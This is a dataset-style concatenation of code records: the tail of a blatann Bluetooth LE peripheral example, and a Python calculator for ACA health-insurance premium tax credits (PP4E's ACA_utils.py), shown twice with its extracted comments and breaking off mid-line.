= service.add_characteristic(constants.COUNTING_CHAR_UUID, constants.COUNTING_CHAR_PROPERTIES, [0]*4) counting_char.on_subscription_change.register(on_gatts_subscription_state_changed) # Create the thread for the counting characteristic counting_char_thread = CountingCharacteristicThread(counting_char) # Create and add the time service time_service = 
ble_device.database.add_service(constants.TIME_SERVICE_UUID) # Add the time characteristic and register the callback for when its read time_char = time_service.add_characteristic(constants.TIME_CHAR_UUID, constants.TIME_CHAR_PROPERTIES, "Time") time_char.on_read.register(on_time_char_read) # Initialize the advertising and scan response data adv_data = advertising.AdvertisingData(local_name=constants.PERIPHERAL_NAME, flags=0x06) scan_data = advertising.AdvertisingData(service_uuid128s=constants.TIME_SERVICE_UUID, has_more_uuid128_services=True) ble_device.advertiser.set_advertise_data(adv_data, scan_data) # Start advertising logger.info("Advertising") ble_device.client.on_connect.register(on_connect) ble_device.client.on_disconnect.register(on_disconnect) ble_device.advertiser.start(timeout_sec=0, auto_restart=True) # Create a waitable that will never fire, and wait for some time w = GenericWaitable() w.wait(60*30, exception_on_timeout=False) # Keep device active for 30 mins # Cleanup counting_char_thread.join() logger.info("Done") ble_device.close() if __name__ == '__main__': main("COM13")
en
0.795256
This example exhibits some of the functionality of a peripheral BLE device, such as reading, writing and notifying characteristics. This peripheral can be used with one of the central examples running on a separate nordic device, or can be run with the nRF Connect app to explore the contents of the service Event callback for when a central device connects to us :param peer: The peer that connected to us :type peer: blatann.peer.Client :param event_args: None Event callback for when the client disconnects from us (or when we disconnect from the client) :param peer: The peer that disconnected :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.DisconnectionEventArgs Event callback for when the client writes to the hex conversion characteristic. This takes the data written, converts it to the hex representation, and updates the characteristic with this new value. If the client is subscribed to the characteristic, the client will be notified. :param characteristic: The hex conversion characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: the event arguments :type event_args: blatann.event_args.WriteEventArgs Event callback for when a client subscribes or unsubscribes from a characteristic. This is the equivalent to when a client writes to a CCCD descriptor on a characteristic. :type characteristic: blatann.gatt.gatts.GattsCharacteristic :type event_args: blatann.event_args.SubscriptionStateChangeEventArgs Event callback for when the client reads our time characteristic. Gets the current time and updates the characteristic. This demonstrates "lazy evaluation" of characteristics--instead of having to constantly update this characteristic, it is only updated when read/observed by an outside actor. 
:param characteristic: the time characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: None Callback for when the service discovery completes on the client. This will look for the client's Device name characteristic (part of the Generic Access Service) and read the value :param peer: The peer the discovery completed on :type peer: blatann.peer.Client :param event_args: The event arguments (unused) :type event_args: blatann.event_args.DatabaseDiscoveryCompleteEventArgs Called when the security level changes, i.e. a bonded device connects and enables encryption or pairing has finished. If security has been enabled (i.e. bonded) and the peer's services have yet to be discovered, discover now. This code demonstrates that even in a peripheral connection role, the peripheral can still discover the database on the client, if the client has a database. :param peer: The peer that security was changed to :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.SecurityLevelChangedEventArgs Event callback for when the pairing process completes with the client :param peer: the peer that completed pairing :type peer: blatann.peer.Client :param event_args: the event arguments :type event_args: blatann.event_args.PairingCompleteEventArgs Event callback that is called when a passkey is required to be displayed to a user for the pairing process. :param peer: The peer the passkey is for :type peer: blatann.peer.Client :param event_args: The event args :type event_args: blatann.event_args.PasskeyDisplayEventArgs Callback for when the user is requested to enter a passkey to resume the pairing process. 
Requests the user to enter the passkey and resolves the event with the passkey entered :param peer: the peer the passkey is for :param passkey_event_args: :type passkey_event_args: blatann.event_args.PasskeyEntryEventArgs Thread which updates the counting characteristic and notifies the client each time its updated. This also demonstrates the notification queuing functionality--if a notification/indication is already in progress, future notifications will be queued and sent out when the previous ones complete. :param characteristic: the counting characteristic :type characteristic: blatann.gatt.gatts.GattsCharacteristic Used to stop and join the thread Event callback that is triggered when the notification finishes sending :param characteristic: The characteristic the notification was on :type characteristic: blatann.gatt.gatts.GattsCharacteristic :param event_args: The event arguments :type event_args: blatann.event_args.NotificationCompleteEventArgs # Do nothing until a client is subscribed # Increment the value and pack it # Send out a notification of this new value # Send a burst of 16, then wait for them all to send before trying to send more # Wait a second before sending out the next burst # Create and open the device # Set up desired security parameters # Create and add the math service # Create and add the hex conversion characteristic to the service # Register the callback for when a write occurs and subscription state changes # Create and add the counting characteristic, initializing the data to [0, 0, 0, 0] # Create the thread for the counting characteristic # Create and add the time service # Add the time characteristic and register the callback for when its read # Initialize the advertising and scan response data # Start advertising # Create a waitable that will never fire, and wait for some time # Keep device active for 30 mins # Cleanup
2.925374
3
PP4E-Examples-1.4/changes/book-web-site/snapshot-oct13/ACA_utils.py
AngelLiang/PP4E
0
6629016
<filename>PP4E-Examples-1.4/changes/book-web-site/snapshot-oct13/ACA_utils.py #!/usr/bin/python3 """ ===================================================================================== Compute ACA (a.k.a. "obamacare") health insurance premium tax credit from income, number people, actual and benchmark plan premiums, IRS povertylevel%=>contribution% mappings, and HHS poverty levels. Main entry point: credit = ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarkpremium) netpremium = actualpremium - credit Used to create functions in Excel for future year projections -- either as a prototype for translation to VBA, or usable directly with a plug-in like PyXLL or DataNitro. Requires inflation of some parematers in this role, not shown here. (Personally, the ACA law today means a 50% premiums increase with no offsetting tax credit, but later years may offset, and possibly eclipse, some of this cost increase.) Sources and resources: An online credit calculator -- http://www.wahbexchange.org/; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2012-05-23/pdf/2012-12421.pdf; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2013-05-03/pdf/2013-10463.pdf; HHS poverty bases -- http://aspe.hhs.gov/poverty/13poverty.cfm#guidelines; An overview -- http://www.cbpp.org/files/QA-on-Premium-Credits.pdf; An example -- http://consumersunion.org/wp-content/uploads/2013/05/Tax_Credit_Worksheet_2014.pdf Note: you should not take the results of this code as gospel (and should not use them for your taxes!); these are ballpark calculations only which may differ slightly from IRS final procedures, and are used for only rough estimation purposes in spreadsheet yearly projections. 
===================================================================================== """ trace = print # or: lambda *args: None ##################################################################################### # poverty percent => pay percent (per IRS) ##################################################################################### # # Per IRS, for mapping income to insuree maximum premium contribution: # (Income/poverty)% low..high => MaxContributionIncome% low..high # IRSpovertyToContribRanges = [ [(0, 133), (2.0, 2.0) ], # povlow%..povhigh%, paylow%..payhigh% [(133, 150), (3.0, 4.0) ], # should this be 2.0..4.0?: not in IRS doc [(150, 200), (4.0, 6.3) ], [(200, 250), (6.3, 8.05)], [(250, 300), (8.05, 9.5) ], [(300, 400), (9.5, 9.5)]] # inclusive at 400, but not for 400.0001 def mapRanges(povpct, povlow, povhigh, paylow, payhigh): # 135, (133..150), (3.0..4.0) """ Evenly map povpct in [povlow..povhigh] to [paylow..payhigh]. All aruments and return value are scaled percentages (*100). See # comments to the right for an example's expected calcs. This scheme may or may not match the final IRS technique. 
""" povrange = povhigh - povlow # 17 = 150 - 133 payrange = payhigh - paylow # 1.0 = 4.0 - 3.0 povincr = povpct - povlow # 2 = 135 - 133 pctincr = povincr / povrange # pct = 2 / 17 paypct = paylow + (pctincr * payrange) # 3.0 + (pct * 1.0) return round(paypct, 2) # per IRS: round to nearest 100th def test_mapRanges(): for [(povlow, povhigh), (paylow, payhigh)] in IRSpovertyToContribRanges: for povpct in range(povlow, povhigh): paypct = mapRanges(povpct, povlow, povhigh, paylow, payhigh) print(povpct, '=>', paypct) print('-' * 40) assert mapRanges(210, 200, 250, 6.3, 8.05) == 6.65 # per IRS doc example assert mapRanges(135, 133, 150, 3.0, 4.0) == 3.12 # original dev example assert mapRanges(150, 150, 200, 4.0, 6.3) == 4.0 assert mapRanges(200, 150, 200, 4.0, 6.3) == 6.3 assert mapRanges(300, 300, 400, 9.5, 9.5) == 9.5 assert mapRanges(400, 300, 400, 9.5, 9.5) == 9.5 ##################################################################################### # income => poverty percent (per HHS) ##################################################################################### def povertyPercent(income, numpeople): """ Result is a percent * 100. Calculate poverty level base from income and size of household. This can change per year, and may or may not reflect inflation. """ HHSpovertyLevels = { 1: 11490, # or index a list[numpeople-1] 2: 15510, # 15510 = 62040 / 4 3: 19530, # 11490 = 45960 / 4 4: 23550, 5: 27570, 6: 31590, # VB: must inflate levels? 7: 35610, 8: 39630} if numpeople in HHSpovertyLevels: povlevel = HHSpovertyLevels[numpeople] else: povlevel = HHSpovertyLevels[8] + (4020 * (numpeople - 8)) return (income / povlevel) * 100 testincomes = (100000, 62039, 62040, 62041, # +$1 income = $0 credit threshhold for 2 ppl! 45959, 45960, 45961, # +$1 income = $0 credit thresshold for 1 ppl! 
22980, 52988, # see asserts ahead 40000, 31021, 31020, 20000, 10000) def test_povertyPercent(): print('=' * 40) for numpeople in (2, 1): for income in testincomes: print(numpeople, income, '=>', povertyPercent(income, numpeople)) print('=' * 40) ##################################################################################### # income => taxcredit (combine tools) ##################################################################################### def applyContribRanges(povpct): """ Calculate max premium contribution % from poverty %. Result and inputs are both scaled percents (* 100). """ lenofranges = len(IRSpovertyToContribRanges) countranges = enumerate(IRSpovertyToContribRanges) for row, [(povlow, povhigh), (paylow, payhigh)] in countranges: lastrow = (row+1 == lenofranges) if lastrow: inrange = (povlow <= povpct <= povhigh) # VB: x <= y and y <= z else: inrange = (povlow <= povpct < povhigh) if inrange: paypct = mapRanges(povpct, povlow, povhigh, paylow, payhigh) trace('(%.2f => %.2f)' % (povpct, paypct)) return paypct return 100 # > high end of ranges: no tax credit offset, pays premium in full def insureePremiumContribution(income, numpeople): """ Calculate insuree's maximum premium contribution $ from income, poverty levels, and contribution percent ranges. """ povertyPct = povertyPercent(income, numpeople) contribPct = applyContribRanges(povertyPct) contribAmt = income * (contribPct / 100) trace('[%s, %s => %.2f, %.2f, %.2f]' % (income, numpeople, contribPct, contribAmt, contribAmt/12)) return contribAmt def ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarksilverpremium): """ ============================================================================ MAIN ENTRY POINT: calculate the premium credit, for Excel formulas. All values here are give as yearly/annual amounts, not monthly. Caveats: --does not handle Medicaid cutoff at 100/133% of poverty line. --does nothing about uneven monthly amounts or prepayments. 
--really computed for -prior- year from payments and old plans. --does nothing for cost-sharing subsidies for out-of-pockets. --may differ slightly from IRS due to rounding errors. --some aspects very per location but are ignored or givens here. Not taxcredit = max(0, (yourpremium - contribution(income, numpeople)): Raw tax credit is difference between the benchmark silver plan's premium for area and the insurees's maximum contribution calculated from income and family size (not insuree premium - contribution). This credit can then be applied to actual premiums regardless of plan (and may hence decrease or increase actual insuree premium contribution), but is capped at the total actual plan cost paid. Thus, calculating tax credits and plan net cost requires income details, plus two plan premiums for your area per year: insuree's actual, and "benchmark" silver plan, in addition to each year's expected poverty line data. There are 6 permutations of the ap, bp, and yc premium and contibution variables, only 2 of which (plus their equality cases) are truly valid: [ap >= bp >= c] (ex:gold>silver) and [bp >= ap >= c] (ex:bronze<silver). ============================================================================ Per final? IRS docs... § 1.36B–3 Computing the premium assistance credit amount. a) In general. A taxpayer’s premium assistance credit amount for a taxable year is the sum of the premium assistance amounts determined under paragraph (d) of this section for all coverage months for individuals in the taxpayer’s family. ... (d) ***Premium assistance amount. The premium assistance amount for a coverage month is the lesser of— (1) The premiums for the month for one or more qualified health plans in which a taxpayer or a member of the taxpayer’s family enrolls; or (2) The excess of the adjusted monthly premium for the applicable benchmark plan over 1/12 of the product of a taxpayer’s household income and the applicable percentage for the taxable year. ... 
(f) Applicable benchmark plan—(1) In general. Except as otherwise provided in this paragraph (f), the applicable benchmark plan for each coverage month is the second lowest cost silver plan ... offered through the Exchange for the rating area where the taxpayer resides ... ============================================================================ """ contributionbase = insureePremiumContribution(income, numpeople) benchmarkexcess = max(0, benchmarksilverpremium - contributionbase) taxcredit = min(actualpremium, benchmarkexcess) netpremium = actualpremium - taxcredit # VB: must inflate premiums return taxcredit # VB: netpremium not returned def test_ACApremiumTaxCredit(): """ Actual insuree and benchmark annual premiums will be taken from spreadsheet table cells in Excel (and possibly inflated for future years): hardcode/estimate here. """ examplepremiums = (431, 816) for numpeople in (2, 1): benchprem = examplepremiums[numpeople-1] * 12 # 2nd lowest silver for area actualprem = benchprem - (100 * 12) # bronze est: $100/mo < silver print('-' * 79) for income in testincomes: print('ppl=%d, inc=%d' % (numpeople, income)) yrtaxcredit = ACApremiumTaxCredit(income, numpeople, actualprem, benchprem) yrnetpremium = actualprem - yrtaxcredit print('** [Month: %d (prem) = %.2f (tax) + %.2f (you)] [Year: %d=%d+%d]\n' % (actualprem/12, yrtaxcredit/12, yrnetpremium/12, actualprem, yrtaxcredit, yrnetpremium)) global trace trace = lambda *args: None assert round(ACApremiumTaxCredit(22980,1,5000,5000), 2) == 3552.26 # actual = benchmark, 200% pov assert round(ACApremiumTaxCredit(22980,1,4500,5000), 2) == 3552.26 # actual < benchmark assert round(ACApremiumTaxCredit(22980,1,3500,5000), 2) == 3500.00 assert round(ACApremiumTaxCredit(22980,1,1000,5000), 2) == 1000.00 assert round(ACApremiumTaxCredit(22980,1,6000,5000), 2) == 3552.26 # actual > benchmark assert round(ACApremiumTaxCredit(22980,1,10000,5000),2) == 3552.26 assert round(ACApremiumTaxCredit(22980,1,1448,5000), 2) == 
1448.00 # actual near contribution assert round(ACApremiumTaxCredit(22980,1,1447,5000), 2) == 1447.00 assert round(ACApremiumTaxCredit(22980,1,5,5000), 2) == 5.00 # unlikely but true assert round(ACApremiumTaxCredit(52988,4,15000,15000), 2) == 11195.46 # 225%: 15000=11195+3804 assert round(ACApremiumTaxCredit(62039,2,8592,9792), 2) == 3898.30 # 399.99%: 8592=3898+4693 (716,816) assert round(ACApremiumTaxCredit(62040,2,8592,9792), 2) == 3898.20 # 400.00%: 8592=3898+4693 (716,816) assert round(ACApremiumTaxCredit(62041,2,8592,9792), 2) == 0 # MASSIVE $4k DROPOFF FOR $1 INCOME! assert round(ACApremiumTaxCredit(94200,4,12000,13200), 2) == 4251.00 # 400%: 12k=4251+7749 (354/645) assert round(ACApremiumTaxCredit(94199,4,12000,13200), 2) == 4251.09 # 400%: ditto assert round(ACApremiumTaxCredit(94201,4,12000,13200), 2) == 0 # MASSIVE DROPOFF FOR 4: (0/1000) trace = print def test_interactive(): """ Test main function with interactively entered parameters. """ print('*' * 80) while True: try: reply = input('[income,people,actprem,benchprem]? ') if not reply: break income, numpeople, actprem, benchprem = [int(x) for x in reply.split(',')] yrtaxcredit = ACApremiumTaxCredit(income, numpeople, actprem, benchprem) yrnetpremium = actprem - yrtaxcredit print('Taxcredit => %.2f, Netpremium => %.2f [Monthly credit/premium: %.2f/%.2f]\n' % (yrtaxcredit, yrnetpremium, yrtaxcredit / 12, yrnetpremium / 12)) except EOFError: break ##################################################################################### # main: self test ##################################################################################### if __name__ == '__main__': test_mapRanges() test_povertyPercent() # comment-out to disable (see also 'trace' setting) test_ACApremiumTaxCredit() test_interactive()
<filename>PP4E-Examples-1.4/changes/book-web-site/snapshot-oct13/ACA_utils.py #!/usr/bin/python3 """ ===================================================================================== Compute ACA (a.k.a. "obamacare") health insurance premium tax credit from income, number people, actual and benchmark plan premiums, IRS povertylevel%=>contribution% mappings, and HHS poverty levels. Main entry point: credit = ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarkpremium) netpremium = actualpremium - credit Used to create functions in Excel for future year projections -- either as a prototype for translation to VBA, or usable directly with a plug-in like PyXLL or DataNitro. Requires inflation of some parematers in this role, not shown here. (Personally, the ACA law today means a 50% premiums increase with no offsetting tax credit, but later years may offset, and possibly eclipse, some of this cost increase.) Sources and resources: An online credit calculator -- http://www.wahbexchange.org/; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2012-05-23/pdf/2012-12421.pdf; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2013-05-03/pdf/2013-10463.pdf; HHS poverty bases -- http://aspe.hhs.gov/poverty/13poverty.cfm#guidelines; An overview -- http://www.cbpp.org/files/QA-on-Premium-Credits.pdf; An example -- http://consumersunion.org/wp-content/uploads/2013/05/Tax_Credit_Worksheet_2014.pdf Note: you should not take the results of this code as gospel (and should not use them for your taxes!); these are ballpark calculations only which may differ slightly from IRS final procedures, and are used for only rough estimation purposes in spreadsheet yearly projections. 
===================================================================================== """ trace = print # or: lambda *args: None ##################################################################################### # poverty percent => pay percent (per IRS) ##################################################################################### # # Per IRS, for mapping income to insuree maximum premium contribution: # (Income/poverty)% low..high => MaxContributionIncome% low..high # IRSpovertyToContribRanges = [ [(0, 133), (2.0, 2.0) ], # povlow%..povhigh%, paylow%..payhigh% [(133, 150), (3.0, 4.0) ], # should this be 2.0..4.0?: not in IRS doc [(150, 200), (4.0, 6.3) ], [(200, 250), (6.3, 8.05)], [(250, 300), (8.05, 9.5) ], [(300, 400), (9.5, 9.5)]] # inclusive at 400, but not for 400.0001 def mapRanges(povpct, povlow, povhigh, paylow, payhigh): # 135, (133..150), (3.0..4.0) """ Evenly map povpct in [povlow..povhigh] to [paylow..payhigh]. All aruments and return value are scaled percentages (*100). See # comments to the right for an example's expected calcs. This scheme may or may not match the final IRS technique. 
""" povrange = povhigh - povlow # 17 = 150 - 133 payrange = payhigh - paylow # 1.0 = 4.0 - 3.0 povincr = povpct - povlow # 2 = 135 - 133 pctincr = povincr / povrange # pct = 2 / 17 paypct = paylow + (pctincr * payrange) # 3.0 + (pct * 1.0) return round(paypct, 2) # per IRS: round to nearest 100th def test_mapRanges(): for [(povlow, povhigh), (paylow, payhigh)] in IRSpovertyToContribRanges: for povpct in range(povlow, povhigh): paypct = mapRanges(povpct, povlow, povhigh, paylow, payhigh) print(povpct, '=>', paypct) print('-' * 40) assert mapRanges(210, 200, 250, 6.3, 8.05) == 6.65 # per IRS doc example assert mapRanges(135, 133, 150, 3.0, 4.0) == 3.12 # original dev example assert mapRanges(150, 150, 200, 4.0, 6.3) == 4.0 assert mapRanges(200, 150, 200, 4.0, 6.3) == 6.3 assert mapRanges(300, 300, 400, 9.5, 9.5) == 9.5 assert mapRanges(400, 300, 400, 9.5, 9.5) == 9.5 ##################################################################################### # income => poverty percent (per HHS) ##################################################################################### def povertyPercent(income, numpeople): """ Result is a percent * 100. Calculate poverty level base from income and size of household. This can change per year, and may or may not reflect inflation. """ HHSpovertyLevels = { 1: 11490, # or index a list[numpeople-1] 2: 15510, # 15510 = 62040 / 4 3: 19530, # 11490 = 45960 / 4 4: 23550, 5: 27570, 6: 31590, # VB: must inflate levels? 7: 35610, 8: 39630} if numpeople in HHSpovertyLevels: povlevel = HHSpovertyLevels[numpeople] else: povlevel = HHSpovertyLevels[8] + (4020 * (numpeople - 8)) return (income / povlevel) * 100 testincomes = (100000, 62039, 62040, 62041, # +$1 income = $0 credit threshhold for 2 ppl! 45959, 45960, 45961, # +$1 income = $0 credit thresshold for 1 ppl! 
22980, 52988, # see asserts ahead 40000, 31021, 31020, 20000, 10000) def test_povertyPercent(): print('=' * 40) for numpeople in (2, 1): for income in testincomes: print(numpeople, income, '=>', povertyPercent(income, numpeople)) print('=' * 40) ##################################################################################### # income => taxcredit (combine tools) ##################################################################################### def applyContribRanges(povpct): """ Calculate max premium contribution % from poverty %. Result and inputs are both scaled percents (* 100). """ lenofranges = len(IRSpovertyToContribRanges) countranges = enumerate(IRSpovertyToContribRanges) for row, [(povlow, povhigh), (paylow, payhigh)] in countranges: lastrow = (row+1 == lenofranges) if lastrow: inrange = (povlow <= povpct <= povhigh) # VB: x <= y and y <= z else: inrange = (povlow <= povpct < povhigh) if inrange: paypct = mapRanges(povpct, povlow, povhigh, paylow, payhigh) trace('(%.2f => %.2f)' % (povpct, paypct)) return paypct return 100 # > high end of ranges: no tax credit offset, pays premium in full def insureePremiumContribution(income, numpeople): """ Calculate insuree's maximum premium contribution $ from income, poverty levels, and contribution percent ranges. """ povertyPct = povertyPercent(income, numpeople) contribPct = applyContribRanges(povertyPct) contribAmt = income * (contribPct / 100) trace('[%s, %s => %.2f, %.2f, %.2f]' % (income, numpeople, contribPct, contribAmt, contribAmt/12)) return contribAmt def ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarksilverpremium): """ ============================================================================ MAIN ENTRY POINT: calculate the premium credit, for Excel formulas. All values here are give as yearly/annual amounts, not monthly. Caveats: --does not handle Medicaid cutoff at 100/133% of poverty line. --does nothing about uneven monthly amounts or prepayments. 
--really computed for -prior- year from payments and old plans. --does nothing for cost-sharing subsidies for out-of-pockets. --may differ slightly from IRS due to rounding errors. --some aspects very per location but are ignored or givens here. Not taxcredit = max(0, (yourpremium - contribution(income, numpeople)): Raw tax credit is difference between the benchmark silver plan's premium for area and the insurees's maximum contribution calculated from income and family size (not insuree premium - contribution). This credit can then be applied to actual premiums regardless of plan (and may hence decrease or increase actual insuree premium contribution), but is capped at the total actual plan cost paid. Thus, calculating tax credits and plan net cost requires income details, plus two plan premiums for your area per year: insuree's actual, and "benchmark" silver plan, in addition to each year's expected poverty line data. There are 6 permutations of the ap, bp, and yc premium and contibution variables, only 2 of which (plus their equality cases) are truly valid: [ap >= bp >= c] (ex:gold>silver) and [bp >= ap >= c] (ex:bronze<silver). ============================================================================ Per final? IRS docs... § 1.36B–3 Computing the premium assistance credit amount. a) In general. A taxpayer’s premium assistance credit amount for a taxable year is the sum of the premium assistance amounts determined under paragraph (d) of this section for all coverage months for individuals in the taxpayer’s family. ... (d) ***Premium assistance amount. The premium assistance amount for a coverage month is the lesser of— (1) The premiums for the month for one or more qualified health plans in which a taxpayer or a member of the taxpayer’s family enrolls; or (2) The excess of the adjusted monthly premium for the applicable benchmark plan over 1/12 of the product of a taxpayer’s household income and the applicable percentage for the taxable year. ... 
(f) Applicable benchmark plan—(1) In general. Except as otherwise provided in this paragraph (f), the applicable benchmark plan for each coverage month is the second lowest cost silver plan ... offered through the Exchange for the rating area where the taxpayer resides ... ============================================================================ """ contributionbase = insureePremiumContribution(income, numpeople) benchmarkexcess = max(0, benchmarksilverpremium - contributionbase) taxcredit = min(actualpremium, benchmarkexcess) netpremium = actualpremium - taxcredit # VB: must inflate premiums return taxcredit # VB: netpremium not returned def test_ACApremiumTaxCredit(): """ Actual insuree and benchmark annual premiums will be taken from spreadsheet table cells in Excel (and possibly inflated for future years): hardcode/estimate here. """ examplepremiums = (431, 816) for numpeople in (2, 1): benchprem = examplepremiums[numpeople-1] * 12 # 2nd lowest silver for area actualprem = benchprem - (100 * 12) # bronze est: $100/mo < silver print('-' * 79) for income in testincomes: print('ppl=%d, inc=%d' % (numpeople, income)) yrtaxcredit = ACApremiumTaxCredit(income, numpeople, actualprem, benchprem) yrnetpremium = actualprem - yrtaxcredit print('** [Month: %d (prem) = %.2f (tax) + %.2f (you)] [Year: %d=%d+%d]\n' % (actualprem/12, yrtaxcredit/12, yrnetpremium/12, actualprem, yrtaxcredit, yrnetpremium)) global trace trace = lambda *args: None assert round(ACApremiumTaxCredit(22980,1,5000,5000), 2) == 3552.26 # actual = benchmark, 200% pov assert round(ACApremiumTaxCredit(22980,1,4500,5000), 2) == 3552.26 # actual < benchmark assert round(ACApremiumTaxCredit(22980,1,3500,5000), 2) == 3500.00 assert round(ACApremiumTaxCredit(22980,1,1000,5000), 2) == 1000.00 assert round(ACApremiumTaxCredit(22980,1,6000,5000), 2) == 3552.26 # actual > benchmark assert round(ACApremiumTaxCredit(22980,1,10000,5000),2) == 3552.26 assert round(ACApremiumTaxCredit(22980,1,1448,5000), 2) == 
1448.00 # actual near contribution assert round(ACApremiumTaxCredit(22980,1,1447,5000), 2) == 1447.00 assert round(ACApremiumTaxCredit(22980,1,5,5000), 2) == 5.00 # unlikely but true assert round(ACApremiumTaxCredit(52988,4,15000,15000), 2) == 11195.46 # 225%: 15000=11195+3804 assert round(ACApremiumTaxCredit(62039,2,8592,9792), 2) == 3898.30 # 399.99%: 8592=3898+4693 (716,816) assert round(ACApremiumTaxCredit(62040,2,8592,9792), 2) == 3898.20 # 400.00%: 8592=3898+4693 (716,816) assert round(ACApremiumTaxCredit(62041,2,8592,9792), 2) == 0 # MASSIVE $4k DROPOFF FOR $1 INCOME! assert round(ACApremiumTaxCredit(94200,4,12000,13200), 2) == 4251.00 # 400%: 12k=4251+7749 (354/645) assert round(ACApremiumTaxCredit(94199,4,12000,13200), 2) == 4251.09 # 400%: ditto assert round(ACApremiumTaxCredit(94201,4,12000,13200), 2) == 0 # MASSIVE DROPOFF FOR 4: (0/1000) trace = print def test_interactive(): """ Test main function with interactively entered parameters. """ print('*' * 80) while True: try: reply = input('[income,people,actprem,benchprem]? ') if not reply: break income, numpeople, actprem, benchprem = [int(x) for x in reply.split(',')] yrtaxcredit = ACApremiumTaxCredit(income, numpeople, actprem, benchprem) yrnetpremium = actprem - yrtaxcredit print('Taxcredit => %.2f, Netpremium => %.2f [Monthly credit/premium: %.2f/%.2f]\n' % (yrtaxcredit, yrnetpremium, yrtaxcredit / 12, yrnetpremium / 12)) except EOFError: break ##################################################################################### # main: self test ##################################################################################### if __name__ == '__main__': test_mapRanges() test_povertyPercent() # comment-out to disable (see also 'trace' setting) test_ACApremiumTaxCredit() test_interactive()
en
0.703796
#!/usr/bin/python3 ===================================================================================== Compute ACA (a.k.a. "obamacare") health insurance premium tax credit from income, number people, actual and benchmark plan premiums, IRS povertylevel%=>contribution% mappings, and HHS poverty levels. Main entry point: credit = ACApremiumTaxCredit(income, numpeople, actualpremium, benchmarkpremium) netpremium = actualpremium - credit Used to create functions in Excel for future year projections -- either as a prototype for translation to VBA, or usable directly with a plug-in like PyXLL or DataNitro. Requires inflation of some parematers in this role, not shown here. (Personally, the ACA law today means a 50% premiums increase with no offsetting tax credit, but later years may offset, and possibly eclipse, some of this cost increase.) Sources and resources: An online credit calculator -- http://www.wahbexchange.org/; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2012-05-23/pdf/2012-12421.pdf; IRS docs -- http://www.gpo.gov/fdsys/pkg/FR-2013-05-03/pdf/2013-10463.pdf; HHS poverty bases -- http://aspe.hhs.gov/poverty/13poverty.cfm#guidelines; An overview -- http://www.cbpp.org/files/QA-on-Premium-Credits.pdf; An example -- http://consumersunion.org/wp-content/uploads/2013/05/Tax_Credit_Worksheet_2014.pdf Note: you should not take the results of this code as gospel (and should not use them for your taxes!); these are ballpark calculations only which may differ slightly from IRS final procedures, and are used for only rough estimation purposes in spreadsheet yearly projections. 
===================================================================================== # or: lambda *args: None ##################################################################################### # poverty percent => pay percent (per IRS) ##################################################################################### # # Per IRS, for mapping income to insuree maximum premium contribution: # (Income/poverty)% low..high => MaxContributionIncome% low..high # # povlow%..povhigh%, paylow%..payhigh% # should this be 2.0..4.0?: not in IRS doc # inclusive at 400, but not for 400.0001 # 135, (133..150), (3.0..4.0) Evenly map povpct in [povlow..povhigh] to [paylow..payhigh]. All aruments and return value are scaled percentages (*100). See # comments to the right for an example's expected calcs. This scheme may or may not match the final IRS technique. # 17 = 150 - 133 # 1.0 = 4.0 - 3.0 # 2 = 135 - 133 # pct = 2 / 17 # 3.0 + (pct * 1.0) # per IRS: round to nearest 100th # per IRS doc example # original dev example ##################################################################################### # income => poverty percent (per HHS) ##################################################################################### Result is a percent * 100. Calculate poverty level base from income and size of household. This can change per year, and may or may not reflect inflation. # or index a list[numpeople-1] # 15510 = 62040 / 4 # 11490 = 45960 / 4 # VB: must inflate levels? # +$1 income = $0 credit threshhold for 2 ppl! # +$1 income = $0 credit thresshold for 1 ppl! # see asserts ahead ##################################################################################### # income => taxcredit (combine tools) ##################################################################################### Calculate max premium contribution % from poverty %. Result and inputs are both scaled percents (* 100). 
# VB: x <= y and y <= z # > high end of ranges: no tax credit offset, pays premium in full Calculate insuree's maximum premium contribution $ from income, poverty levels, and contribution percent ranges. ============================================================================ MAIN ENTRY POINT: calculate the premium credit, for Excel formulas. All values here are give as yearly/annual amounts, not monthly. Caveats: --does not handle Medicaid cutoff at 100/133% of poverty line. --does nothing about uneven monthly amounts or prepayments. --really computed for -prior- year from payments and old plans. --does nothing for cost-sharing subsidies for out-of-pockets. --may differ slightly from IRS due to rounding errors. --some aspects very per location but are ignored or givens here. Not taxcredit = max(0, (yourpremium - contribution(income, numpeople)): Raw tax credit is difference between the benchmark silver plan's premium for area and the insurees's maximum contribution calculated from income and family size (not insuree premium - contribution). This credit can then be applied to actual premiums regardless of plan (and may hence decrease or increase actual insuree premium contribution), but is capped at the total actual plan cost paid. Thus, calculating tax credits and plan net cost requires income details, plus two plan premiums for your area per year: insuree's actual, and "benchmark" silver plan, in addition to each year's expected poverty line data. There are 6 permutations of the ap, bp, and yc premium and contibution variables, only 2 of which (plus their equality cases) are truly valid: [ap >= bp >= c] (ex:gold>silver) and [bp >= ap >= c] (ex:bronze<silver). ============================================================================ Per final? IRS docs... § 1.36B–3 Computing the premium assistance credit amount. a) In general. 
A taxpayer’s premium assistance credit amount for a taxable year is the sum of the premium assistance amounts determined under paragraph (d) of this section for all coverage months for individuals in the taxpayer’s family. ... (d) ***Premium assistance amount. The premium assistance amount for a coverage month is the lesser of— (1) The premiums for the month for one or more qualified health plans in which a taxpayer or a member of the taxpayer’s family enrolls; or (2) The excess of the adjusted monthly premium for the applicable benchmark plan over 1/12 of the product of a taxpayer’s household income and the applicable percentage for the taxable year. ... (f) Applicable benchmark plan—(1) In general. Except as otherwise provided in this paragraph (f), the applicable benchmark plan for each coverage month is the second lowest cost silver plan ... offered through the Exchange for the rating area where the taxpayer resides ... ============================================================================ # VB: must inflate premiums # VB: netpremium not returned Actual insuree and benchmark annual premiums will be taken from spreadsheet table cells in Excel (and possibly inflated for future years): hardcode/estimate here. # 2nd lowest silver for area # bronze est: $100/mo < silver # actual = benchmark, 200% pov # actual < benchmark # actual > benchmark # actual near contribution # unlikely but true # 225%: 15000=11195+3804 # 399.99%: 8592=3898+4693 (716,816) # 400.00%: 